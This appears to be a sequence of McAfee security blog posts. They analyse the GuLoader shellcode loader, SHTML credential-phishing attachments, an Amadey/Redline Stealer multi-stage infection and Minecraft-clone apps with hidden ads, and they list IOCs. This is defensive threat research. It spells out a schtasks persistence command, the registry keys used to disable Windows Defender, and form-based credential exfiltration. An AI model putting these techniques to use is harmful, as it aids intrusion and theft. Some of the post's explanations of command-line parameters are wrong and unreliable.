• The Gu loader uses ZwGetContextThread and NtSetContextThread routines to accomplish modification of the thread state. The CONTEXT structure is retrieved via ZwGetContextThread, the value [ebp+14C] is used as the entry point address. The current EIP value held in the EIP field in the context structure of the thread will be changed to a recalculated address based on value at ebp+4. Below image shows the RVA calculation.  The base address of the executing shellcode (stage 2) is subtracted from the virtual address [ebp+4] to obtain RVA.  

 

The RVA is added to the base address of the newly allocated memory in the CasPol.exe process to obtain new VA which can be used in the remote process. The new VA is written into EIP and EBX field in the thread context structure of the CasPol.exe process retrieved via ZwGetContextThread. Below image shows the modified context structure and value of EIP.  

 

Finally, by calling ZwSetContextThread, the changes made to the CONTEXT structure is committed in the target thread of CasPol.exe process. The thread is resumed by calling NtResumeThread. The CasPol.exe resumes execution and performs stage 3 of the infection chain. 

Stage 3: Payload Deployment  

The GULoader shellcode resumes execution from within a new host process, in this report, analyzed samples inject the shellcode either into the same process spawned as a child process or caspol.exe. Stage3 performs all the anti-analysis once again to make sure this stage is not being analyzed. After all checks, GUloader proceeds to perform stage3 activities by decoding the encoded C2 string in the memory as shown in the image below. The decoding method is the same as discussed before. 

Later the addresses of following functions are resolved dynamically by loading wininet.dll: 

• InternetOpenA 

• InternetSetOptionA 
• InternetOpenUrlA 
• InternetReadFile 
• InternetCloseHandle. 

The below image shows the response from the content delivery network (cdn) server where the final payload is stored. In this analysis, a payload of size 0x2E640 bytes is sent to the loader. Interestingly, the first 40 bytes are ignored by the loader. The actual payload starts from the offset 40 which is highlighted in the image. 

 

The cdn server is well protected, it only serves to clients with proper headers and cookies. If these are not present in the HTTP request, the following message is shown to the user. 

Final Payload 

Quasi Key Generation 

The first step in decoding the the downloaded final payload by the GUloader is generating a quasi key which will be later used in decoding the actual key embeded in the GULoader shellcode. The encoded embeded key size is 371 bytes in analysed sample. The process of quasi key generation is as follows: 

• The 40th and 41st bytes (word) are retrived from the download buffer in the memory. 
• The above word is XORed with the first word of the encoded embeded key along and a counter value. 
• The process is repeated untill the the word taken from the downloaded data fully decodes and have a value of 0x4D5A “MZ”. 
• The value present in the counter when the 4D5A gets decoded is taken as the quasi key. This key is shown as “key-1” in the image below. In the analysed sample the value of this key is “0x5448” 

Decoding Actual Key 

The embedded key in the GULoader shellcode is of the size 371 bytes as discussed before. The quasi key is used to decode the embeded key as shown in the image below. 

• Each word in the embeded key is XORed with quasi key key-1. 
• When the interation counter exceeds the size value of 371 bytes, it stops and proceeds to decode the downloaded payload with this new key. 

The decoded 371 bytes of embeded key is shown below in the image below. 

Decoding File 

A byte level decoding happens after embeded key is decoded in the memory. Each byte of the downloaded data is XORed with the key to obtain the actual data, which is a PE file. The decoded data is overwritten to the same buffer used to download the decoded data. 

The final decoded PE file residing in the memory is shown in the image below: 

Finally, the loader loads the PE file by allocating the memory with RWX permission in the stage3 process, based on analyzing multiple samples it’s either the same process in stage 2 as the child process, or casPol.exe. The loading involved code relocation and IAT correction as expected in such a scenario. The final payload resumes execution from within the hollowed stage3 process. Below malware families are usually seen deployed by the GULoader: 

• Vidar (Stealer) 
• Raccoon (Stealer) 
• Remcos RAT 

Below image shows the injected memory regions in stage3 process caspol.exe in this report. 

Conclusion  

The role played by malware loaders popularly known as “crypters” is significant in the deployment of Remote Administration Tools and stealer malwares that target consumer data. The exfiltrated Personal Identifiable Information (PII) extracted from the compromised endpoints are largely collected and funneled to various underground data selling marketplaces. This also impacts businesses as various critical information used for authentication purposes are getting leaked from the personal systems of the user leading to initial access on the company networks. The GuLoader is heavily used in mass malware campaigns to infect the users with popular stealer malware like Raccoon, Vidar, and Redline. Commodity RATs like Remcos are also seen delivered in such campaign activities. On the bright side, it is not difficult to fingerprint malware specimens used in the mass campaigns because of the volume its volume and relevance, detection rules and systems can be built around this very fact. 

 

Following table summarizes all the dynamically resolved Win32 APIs  

Win32 API

RtlAddVectoredExceptionHandler

NtAllocateVirtualMemory

DbgUIRemoteBreakIn

LdrLoadDll

DbgBreakPoint

EnumWindows

Nt/ZwSetInformationThread

EnumDeviceDrivers

GetDeviceDriverBaseNameA

MsiEnumProductsA

MsiGetProductInfoA

TerminateProcess

ExitProcess

NtSetContextThread

NtWriteVirtualMemory

NtCreateSection

NtMapViewOfSection

NtOpenFile

NtSetInformationProcess

NtClose

NtResumeThread

NtProtectVirtualMemory

CreateProcessInternal

GetLongPathNameW

Sleep

NtCreateThreadEx

WaitForSingleObject

TerminateThread

CreateFileW

WriteFile

CloseHandle

GetFileSize

ReadFile

ShellExecuteW

SHCreateDirectoryExW

RegCreateKeyExA

RegSetValueExA

OpenSCManagerA

EnumServiceStatusA

CloseServiceHandle

NtQueryInformationProcess

InternetOpenA

InternetSetOptionA

InternetOpenUrlA

InternetReadFile

InternetCloseHandle

 

IOC 

889fddcb57ed66c63b0b16f2be2dbd7ec0252031cad3b15dfea5411ac245ef56 

59b71cb2c5a14186a5069d7935ebe28486f49b7961bddac0a818a021373a44a3 

4d9cdd7526f05343fda35aca3e0e6939abed8a037a0a871ce9ccd0e69a3741f2 

c8006013fc6a90d635f394c91637eae12706f58897a6489d40e663f46996c664 

c69e558e5526feeb00ab90efe764fb0b93b3a09692659d1a57c652da81f1d123 

45156ac4b40b7537f4e003d9f925746b848a939b2362753f6edbcc794ea8b36a 

e68ce815ac0211303d2c38ccbb5ccead144909d295230df4b7a419dfdea12782 

b24b36641fef3acbf3b643967d408b10bf8abfe1fe1f99d704a9a19f1dfc77e8 

569aa6697083993d9c387426b827414a7ed225a3dd2e1e3eba1b49667573fdcb 

60de2308ebfeadadc3e401300172013be27af5b7d816c49696bb3dedc208c54e 

23458977440cccb8ac7d0d05c238d087d90f5bf1c42157fb3a161d41b741c39d 

The post GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader appeared first on McAfee Blog.

Authored By Anuradha

McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information. 

SHTML Campaign in the field: 

Figure 1. shows the geological distribution of McAfee clients who detect malicious SHTML files. 

Figure 1. McAfee Client Detection of SHTML 

 

Attackers victimize users by distributing SHTML files as email attachments. The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.  

Figure 2. Email with SHTML attachment 

 

Analysis: 

When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser as shown in Figure 3. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled. 

Figure 3. Fake PDF document 

 

Figure 4. Fake Excel document 

 

Figure 5. Fake DHL Shipping document

 

Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior. 

 

Figure 6. SHTML with JavaScript code 

 

Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as: 

https://isc.sans.edu  

https://i.gyazo.com 

Figure 7. Code to load blurred image  

 

Abusing submission form service: 

Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark

Formspree.io is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address. 

The attackers use the formpsree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method.  

 

Figure 8. Formspree.io as action URL with POST method 

 

When the user enters the credentials and hits the “submit” button, the data is sent to Formspree.io. Subsequently, Formspree.io forwards the information to the specified email address. Below Figure 9. shows the flow of user submission data from webpage to attacker email address. 

Figure 9. Flow of user submission data 

 

Known malicious forms may be blocked, preventing the form submission data from being sent to the attacker. Below Figure 10. shows the Form blocked due to suspected fraudulent activity. 

Figure 10. Form Blocked 

 

To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated to a legitimate website. 

Below Figure 11.  shows the redirected webpage.

Figure 11. Redirected webpage 

 

To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry image phishing scam uses simple basic HTML and JavaScript code, but it can still be effective. A blurry image is enough to trick many users into believing the email as legitimate. To stay protected, users should keep their system up-to-date and refrain from clicking links and opening SHTML attachments that comes through email from untrusted sources. 

 

IOCs 

McAfee customers are protected against this phishing campaign. 

Type   Value   Product   Detected   URL   formspree[.]io/f/xjvderkn  McAfee WebAdvisor   Blocked   URL   cianindustries[].com/error/excel.php  McAfee WebAdvisor   Blocked     URL   twenty88[.]com/mincs/mea.ph  McAfee WebAdvisor   Blocked   URL   sweet.classicbo[.]com/mailb_fixpd.ph  McAfee WebAdvisor   Blocked

 

Type	Value	Product	Detected
shtml(Adobe)	0a072e7443732c7bdb9d1f3fdb9ee27c	Total Protection and LiveSafe	HTML/Phishing.qz
shtml(Excel)	3b215a37c728f65c167941e788935677	Total Protection and LiveSafe	HTML/Phishing.rb
shtml(DHL)	257c1f7a04c93a44514977ec5027446c	Total Protection and LiveSafe	HTML/Phishing.qz

 

 

The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.

Authored by By Yashvi Shah 

McAfee Labs have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.  

Wextract.exe is a Windows executable file that is used to extract files from a cabinet (.cab) file. Cabinet files are compressed archives that are used to package and distribute software, drivers, and other files. It is a legitimate file that is part of the Windows operating system, and it is located in the System32 folder of the Windows directory. However, like other executable files, it can be vulnerable to exploitation by malicious actors who might use it as a disguise for malware. 

Some common ways that malicious actors use a fake or modified version of wextract.exe include: 

1. Malware Distribution: Malicious actors can use a fake version of the wextract.exe to deliver malware onto a victim’s computer. They can disguise the malware as a legitimate file and use the fake wextract.exe to extract and execute the malicious code. 
2. Information stealing: A fake or modified wextract.exe can be used to steal sensitive information from a victim’s computer. Malicious actors can modify the code to include keyloggers or other data-stealing techniques. 
3. Remote Access: Malicious actors can use a fake wextract.exe to gain remote access to a victim’s computer. They can use the modified wextract.exe to create a backdoor or establish a remote connection to the victim’s computer, allowing them to carry out various malicious activities. 
4. Ransomware Delivery: Malicious actors can use a fake or modified “wextract.exe” to install ransomware on a victim’s system. For example, they may create a fake Windows Installer package that appears to be a legitimate software update or utility but also includes a modified “wextract.exe” that encrypts the victim’s files and demands a ransom payment for their decryption.  

McAfee Labs collected malicious wextract.exe samples from the wild, and its behavior was analyzed.  

This blog provides a detailed technical analysis of malicious “wextract.exe” that is used as a delivery mechanism for multiple types of malwares, including Amadey and Redline Stealer. It also provides detailed information on the techniques used by the malware to evade detection by security software and execute its payload. Once the malware payloads are executed on the system, they establish communication with a Command and Control (C2) server controlled by the attacker. This communication allows the attacker to exfiltrate data from the victim’s system, including sensitive information such as login credentials, financial data, and other personal information.

Figure 1: Characteristic of the file 

 

The file is a 32-bit Portable Executable file, which is 631.50 Kb in size. The original name of the file is WEXTRACT.EXE.MUI. The file description is “Самоизвлечение CAB-файлов Win32”, written in Russian, and means “Self-Extracting Win32 CAB Files”. The legal copyright mentions Microsoft Corporation. A lot of static strings of this file were found to be written in Russian. 

Normally, the resource section (.rsrc) contains resources used by the program, such as icons, bitmaps, strings, and dialog boxes. Attackers leverage the resource section of a PE file to improve the success of their attacks by evading detection, enhancing persistence, and adding functionality. 

The resource section of this sample has multiples files, out of which CABINET resource holds 75.75% of the total file, which makes the said resource suspicious. 

Figure 2: Resources in the file 

 

A CAB (Cabinet) file is a compressed archive file format that is often used to compress and package multiple files into a single file for distribution or installation. A CAB file in the resource section of a PE file can be used for various purposes such as storing additional program files or data, including language-specific resources, or compressing and storing commonly used resources to reduce the size of the executable.  

The CABINET holds two executables, cydn.exe and vona.exe. 

Figure 3: CABINET in resource section 

 

Likewise, under RCDATA, there is another attribute called “RUNPROGRAM”, which starts cydn.exe.  RUNPROGRAM in the resource section of a malware file typically refers to a resource that contains instructions for the malware to execute a specific program or command. When the malware is executed, it will load the resource containing the “RUNPROGRAM” command and attempt to execute the specified program or command. This technique is often used by malware authors to execute additional malicious programs or commands on the infected system. For example, the “RUNPROGRAM” resource may contains instructions to download and execute additional malware, or to launch a malicious script or command that can perform various malicious activities such as stealing sensitive data, creating backdoors, or disabling security software. 

Figure 4: RUNPROGRAM attribute stating “cydn.exe” 

 

Like RUNPROGRAM, POSTRUNPROGRAM also holds the instruction to run the executable after RUNPROGRAM is executed. Hence, once cydn.exe is executed, vona.exe will be executed. 

Figure 5: POSTRUNPROGRAM stating “vona.exe” 

Once WEXTRACT.exe is executed, both cydn.exe and vona.exe is dropped in the TEMP folder. The TEMP folder is a commonly used location for malware to store temporary files and other data, as it is typically writable by any user account and is not usually subject to strict security restrictions. This can make it easier for the malware to operate without raising suspicion or triggering security alerts. 

Figure 6: Files dropped in TEMP folder 

Stage 2: Analysis of cydn.exe 

The file showed high file ratio of the resource section, with the entropy of 7.810. Entropy is a measure of the randomness or unpredictability of the data in the file. It is often used as an indicator of whether a file is likely to be malicious or not. 

In the case of a PE file, high entropy can indicate that the file contains a significant amount of compressed or encrypted data, or that it has been obfuscated or packed in a way that makes it more difficult to analyze. This can be a common technique used by malware authors to evade detection by antivirus software. 

 

Figure 7: File ratio and entropy of the resource section 

 

Like the previous file, cydn.exe also had two executables archived in its resource section, named aydx.exe and mika.exe. The “RUNPROGRAM” attribute commands to run aydx.exe and the “POSTRUNPROGRAM” attribute commands to execute mika.exe once aydx.exe is executed. These files are also dropped in TEMP folder. 

Figure 8: aydx.exe and mika.exe packed in resource section 

 

Figure 9: Executables dropped in another TEMP folder 

The order of file execution is as follows: First, Wextract.exe and cydn.exe, which have already been discussed, are followed by aydx.exe, and then by mika.exe and vona.exe. 

 

Figure 10: Execution flow 

Stage 3: Analysis of aydx.exe 

Aydx.exe is a 32-bit Portable Executable file, which is 405Kb and is compiled in C/C++. Once executed, it attempts to make a request to IP address: 193.233.20.7. 

Figure 11: Malware trying to connect to IPv4 

This IP address is linked with Redline Stealer connecting on port number 4138. 

Analysis of mika.exe 

Mika.exe is 32-bit Portable Executable, complied in .NET and is just 11 KB in size. The original name of the file is “Healer.exe”. This exe file makes no internet activity but does something in the target machine which assists malwares from further stages to carry out their execution.  

The intent of mika.exe is to turn off Windows Defender in all possible ways. Once mika.exe was executed, this is how the Defender settings of the system looked like: 

Figure 12: Real-time protection turned off 

This setting was irreversible and couldn’t be turned back to on via settings of Windows. Following this, logs from Procmon were analyzed and there were entries regarding Windows defender, such as: 

Figure 13: Procmon logs 

To validate this, Registry was analysed and all the changes were found there. The changes in Registry were found to be in exact order as of Procmon logs. In Windows, the registry is a hierarchical database that stores configuration settings and options for the operating system, as well as for applications and devices. It is used to store information about the hardware, software, user preferences, and system settings on a Windows computer. Following keys are added under Real-Time Protection: 

• DisableBehaviourMonitoring 
• DisableIOAVProtection 
• DisableOnAccessProtection 
• DisableRealtimeMonitoring 
• DisableScanOnRealitimeEnable 

Figure 14: Keys added in Registry 

By doing so malware is restricting all the normal users from turning the Windows Defender on. When attackers disable Windows Defender through the registry, the change is likely to persist even if the user or administrator tries to re-enable it through the Windows Defender settings. This allows the attacker to maintain control over the system for a longer period. This supports malwares of further stages to easily execute themselves without any hinderances. This can be leveraged by all the malwares, regardless of their correspondence to this very campaign. 

Stage 4: Analysis of vona.exe 

Vona.exe, a variant of the Amadey malware family, is compiled in C/C++ and is 236 KB in size. This is the last file to be executed from the current cluster.  When executed, a highly extensive process tree quickly appeared. 

Figure 15: Process tree of vona.exe 

 

Stage 5: Analysis of mnolyk.exe 

An immediate child process of vona.exe is mnolyk.exe, another Amadey component, is dropped in a folder in TEMP folder. 

 

Figure 16: mnolyk.exe dropped in TEMP folder 

Mnolyk.exe makes active connections to IP addresses 62.204.41.5 and 62.204.41.251 

Malicious DLLs are downloaded from 62.204.41.5, which are executed later in the campaign. The target was made to search for two different DLLs, namely cred.dll and clip.dll. 

Figure 17: Malicious dlls downloaded 

 

From 62.204.41.251, various exe files are downloaded to the TEMP folder, and later executed. Exes downloaded are: 

fuka.exe 

Figure 18: fuka.exe 

 

nikas.exe 

Figure 19: nikas.exe 

igla.exe 

Figure 20: igla.exe 

nocr.exe

Figure 21: nocr.exe 

lebro.exe

Figure 22: lebro.exe 

 

Following the execution of mnolyk.exe, a series of schtasks.exe and cacls.exe were executed. 

The command line for schtasks.exe is “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR “C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe” /F 

• “/Create” – This is the command to create a new scheduled task. 

• “/SC MINUTE” – This parameter sets the scheduling interval for the task to “MINUTE”. The task will run every minute. 
• “/MO 1” – This parameter sets the repeat count to “1”. The task will run only once. 
• “/TN” – This parameter specifies the name of the task. The name should be specified after the “/TN” parameter. 

So, the entire command line “schtasks.exe /Create /SC MINUTE /MO 1 /TN” would create a scheduled task that runs once every minute. The name of the task specified is the path to mnolyk.exe. 

 

There were several instances of cacls.exe created. One of them is explained here along with its parameter. The command line is “CACLS  ”mnolyk.exe” /P “test:R” /E” 

• “CACLS” – This is the command to change the ACL of a file. 
• “mnolyk.exe” – This is the file for which the ACL will be modified. 
• “/P test:R” – This parameter specifies the permission change for a user named “test”. The “:R” at the end indicates that the “test” user will be granted “Read” permission. 
• “/E” – This parameter specifies that the ACL change will be made to the file’s effective ACL. The effective ACL is the actual set of permissions that are applied to the file. 

So, the entire command line “CACLS mnolyk.exe /P test:R /E” would grant the “test” user or group “Read” permission to the “mnolyk.exe” file. Hence the user “test” can neither write nor delete this file. If in place of “/P test:R”, “/P test:N” was mentioned, which is mentioned in one of the command line, it would give “None” permission to the user. 

 

Stage 6: Analyzing fuka.exe, nikas.exe, igla.exe, nocr.exe and lebro.exe 

Fuka.exe 

Fukka.exe, a variant of the Redline Stealer malware family, is 175 KB and is compiled in .NET. The original name of the file is Samarium.exe. It shows some network activity with IP 193.233.20.11. 

Figure 23: Network activity of fuka.exe 

Nikas.exe 

Nikas.exe is 248 KB executable file compiled in C/C++. It disables automatic updates for Windows and checks the status of all the sub-fields of Real-Time Protection that were previously changed by mika.exe. No network activity was found during replication. 

Igla.exe 

Igla.exe is 520 KB file, compiled in C/C++. The original name of the file is WEXTRACT.EXE.MUI. Like we saw in cydn.exe, this PE has also two more exes packed in its resource section, bvPf.exe and cmkmka.exe. Once igla.exe is executed, bvPf.exe is executed, followed by cmkmka.exe. 

Figure 24: RUNPROGRAM attribute in igla.exe 

 

Figure 25: POSTRUNPROGRAM attribute in igla.exe 

 

bvPf.exe 

bvPf.exe is 306 KB in size and is compiled in C/C++.  The original filename is nightskywalker.exe. The file is dropped in a folder in TEMP folder of the system. 

The exe has tried connecting to 193.233.20.11, but server did not respond, and no communication took place. 

cmkmka.exe 

cmkmka.exe is 32-bit PE file, 283.5 KB in size. It further launches AppLaunch.exe which communicates to C2. 

It communicates to the IP address: 176.113.115.17 which is an active C2 for Redline Stealer and connects to the port 4132. 

 

Figure 26: Data exfiltration 

 

The blue-colored content in the data indicates the information being transmitted from the Command and Control (C2) server, which is providing instructions to the malware regarding the specific data that needs to be retrieved along with their corresponding paths. These paths include user profiles of different web browsers, various crypto wallet paths, and other related data. 

As a response, all the data residing at the specified paths is sent back to the C2 server of the malware. This includes all the profiles of different web browsers, information related to crypto wallets, and even user-related data from the Windows operating system. This process allows the C2 server to collect a vast amount of sensitive information from the infected system, which could be exploited by the attackers for malicious purposes. 

Nocr.exe 

Nocr.exe, a component of Redline Stealer, is a 175 KB .NET binary. The original name of the file is Alary.exe.  It communicates to the IP address 176.113.115.17. 

Lebro.exe 

Lebro.exe, a component of Amadey, is a 235 KB file, compiled in C/C++. Lebro.exe is responsible for executing nbveek.exe, which is a next stage of the malware. The file is again dropped in TEMP folder. 

Figure 27: Dropping another executable in TEMP folder 

Stage 7: Analyzing nbveek.exe 

The hashes of lebro.exe and nbveek.exe are same, they are the same binaries, hence it is Amadey. It is connecting to IP 62.204.41.88.  

 

Figure 28: Network activity of nbveek.exe 

 

The target system executes a php file, and the content of file includes the command to download another exe called setupff.exe. This exe is downloaded to the TEMP folder. 

Before setupff.exe is executed, again the series of schtasks.exe and cacls.exe are executed which were seen previously also. The same parameters were passed for nbveek.exe as they were for mnolyk.exe. 

Setupff.exe 

Setupff.exe is compiled in C/C++ and is 795 KB.  The file could not execute and threw Windows error. 

Stage 8: Final stage 

Later, another instance of setupff.exe was created which further invokes multiple instances of rundll32.exe. Here, the two dlls downloaded by mnolyk.exe, clip64.dll and cred64.dll, are executed through rundll32.exe. McAfee Labs detects these dlls to be Amadey maware. 

The network activity shows the dll to be connecting to 62.204.41.88. This dll again starts exfiltrating data to C2: 

 

Figure 29:Data exfiltration 

 

To conclude, the threat posed by the multi-stage attack that drops the Amadey botnet, and subsequently Redline Stealer, is significant and requires constant vigilance from both consumers and security professionals. By using the Amadey botnet as a delivery mechanism for other malware, attackers can leverage these same capabilities to evade detection and maintain persistence on infected computers. They can use Amadey to drop a wide range of malware, such as spyware, ransomware, and trojans, which can be used for a variety of malicious purposes, such as stealing sensitive information, encrypting files for ransom, or taking control of a computer for use in a larger botnet. Our analysis of various samples of this attack has revealed that the Amadey botnet distributes malware from multiple families and is not restricted to Redline Stealer alone. 

At McAfee, we are committed to providing our customers with robust and effective antivirus and anti-malware solutions that can detect and protect against threats like the Amadey botnet and other malware families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats before they can cause damage. 

 

Indicators of Compromise (IOCs): 

File Type	SHA-256	Product	Detection
.exe	80fed7cd4c7d7cb0c05fe128ced6ab2b9b3d7f03edcf5ef532c8236f00ee7376	Total Protection and LiveSafe	Downloader-FCND Lockbit-FSWW PWS-FDON
.exe	d8e9b2d3afd0eab91f94e1a1a1a0a97aa2974225f4f086a66e76dbf4b705a800	Total Protection and LiveSafe	PWS-FDON Lockbit-FSWW
.exe	1d51e0964268b35afb43320513ad9837ec6b1c0bd0e56065ead5d99b385967b5	Total Protection and LiveSafe	Lockbit-FSWW
.exe	850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38	Total Protection and LiveSafe	PWS-FDON
.exe	6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116	Total Protection and LiveSafe	Downloader-FCND
.exe	6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116	Total Protection and LiveSafe	Downloader-FCND
.exe	8020580744f6861a611e99ba17e92751499e4b0f013d66a103fb38c5f256bbb2	Total Protection and LiveSafe	AgentTesla-FCYU
.exe	021ae2fadbc8bc4e83013de03902e6e97c2815ab821adaa58037e562a6b2357b	Total Protection and LiveSafe	Lockbit-FSWW
.exe	aab1460440bee10e2efec9b5c83ea20ed85e7a17d4ed3b4a19341148255d54b1	Total Protection and LiveSafe	Lockbit-FSWW
.exe	54ce28a037eea87448e65bc25f8d3a38ddd4b4679516cc59899b77150aa46fcc	Total Protection and LiveSafe	GenericRXVK-HF
.exe	0cca99711baf600eb030bbfcf279faf74c564084e733df3d9e98bea3e4e2f45f	Total Protection and LiveSafe	AgentTesla-FCYU
.exe	ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b	Total Protection and LiveSafe	Downloader-FCND
.exe	ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b	Total Protection and LiveSafe	Downloader-FCND
.exe	d40d2bfa9fcbf980f76ce224ab6037ebd2b081cb518fa65b8e208f84bc155e41	Total Protection and LiveSafe	GenericRXVJ-QP
.dll	cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0	Total Protection and LiveSafe	PWS-FDOE
.dll	10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8	Total Protection and LiveSafe	Trojan-FUUW
.dll	3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405	Total Protection and LiveSafe	Trojan-FUUW
IPv4	193.233.20.7
IPv4	62.204.41.5
IPv4	62.204.41.251
IPv4	193.233.20.11
IPv4	176.113.115.17
IPv4	62.204.41.88

 

The post Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution appeared first on McAfee Blog.

Authored by Dexter Shin 

Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative. 

Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are so many games with the same concept as Minecraft worldwide. Even on Google Play, we can easily search for similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to send packets stealthily for advertising revenue in bulk.  

McAfee, a member of the App Defense Alliance, focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security. 

How is it distributed to users? 

They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads. 

Figure 1. 10M+ downloaded app being one of them 

Also, because they can play the game, users can’t notice the large amount of advertising packets being generated on their devices. 

Figure 2. Game screen that can be played 

What does it do?

After the game is running, the user can play without any problems in the block-based world, only like Minecraft-type games. However, advertisement packets of various domains continuously occur on the device. For example, the four packets shown in the picture are questionable packets generated by the ads libraries of Unity, Supersonic, Google, and AppLovin. Unfortunately, nothing is displayed on the game screen. 

Figure 3. Continuous advertising packets 

What’s even more interesting is the initial network packets of these games. The structure of the initial packet is very similar. All domains are different. But using 3.txt as the path is equivalent. That is, packets in the form of https://(random).netlify.app/3.txt commonly occur first. The picture below is an example of the first packet extracted from three different apps. 

Figure 4. Similarity of the initial packet form 

Users affected worldwide 

This threat has been detected in various countries around the world. Indicated by our telemetry, the threat has been most prominently detected in the United States, Canada, South Korea, and Brazil.

 

Figure 5. Users around the world who are widely affected 

 

As we featured in the McAfee 2023 Consumer Mobile Threat Report, one of the most accessible content for young people using mobile devices is games. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but they can easily trust games from official stores such as Google Play. 

 

We first recommend that users thoroughly review user reviews before downloading applications from the store. And users should install security software on their devices and always keep up to date. 

 

Indicators of Compromise 

 

Package Name	Application Name	SHA256	GooglePlay  Downloads
com.good.robo.game.builder.craft.block	Block Box Master Diamond	300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857	10M+
com.craft.world.fairy.fun.everyday.block	Craft Sword Mini Fun	72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137	5M+
com.skyland.pet.realm.block.rain.craft	Block Box Skyland Sword	d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b	5M+
com.skyland.fun.block.game.monster.craft	Craft Monster Crazy Sword	cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851	5M+
com.monster.craft.block.fun.robo.fairy	Block Pro Forrest Diamond	08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af	1M+
com.cliffs.realm.block.craft.rain.vip	Block Game Skyland Forrest	34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb	1M+
com.block.builder.build.clever.craft.boy	Block Rainbow Sword Dragon	23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5	1M+
com.fun.skyland.craft.block.monster.loki	Craft Rainbow Mini Builder	88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068	1M+
com.skyland.craft.caves.game.monster.block	Block Forrest Tree Crazy	010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf	1M+
com.box.block.craft.builder.cliffs.build	Craft Clever Monster Castle	11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224	500K+
com.block.sun.game.box.build.craft	Block Monster Diamond Dragon	19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0	500K+
com.builder.craft.diamond.block.clever.robo	Craft World Fun Robo	746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853	500K+
com.block.master.boy.craft.cliffs.diamond	Block Pixelart Tree Pro	25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397	500K+
com.fun.block.everyday.boy.robo.craft	Craft Mini Lucky Fun	9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff	500K+
com.builder.craft.block.sun.game.mini	Block Earth Skyland World	b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed	500K+
com.dragon.craft.world.pixelart.block.vip	Block Rainbow Monster Castle	d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1	500K+
com.craft.vip.earth.everyday.block.game	Block Fun Rainbow Builder	f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f	500K+
com.block.good.mini.craft.box.best	Craft Dragon Diamond Robo	e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9	500K+
com.lucky.robo.craft.loki.block.good	Block World Tree Monster	06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d	100K+
com.caves.robo.craft.dragon.block.earth	Block Diamond Boy Pro	122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0	100K+
com.tree.world.city.block.craft.crazy	Block Lucky Master Earth	e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15	100K+
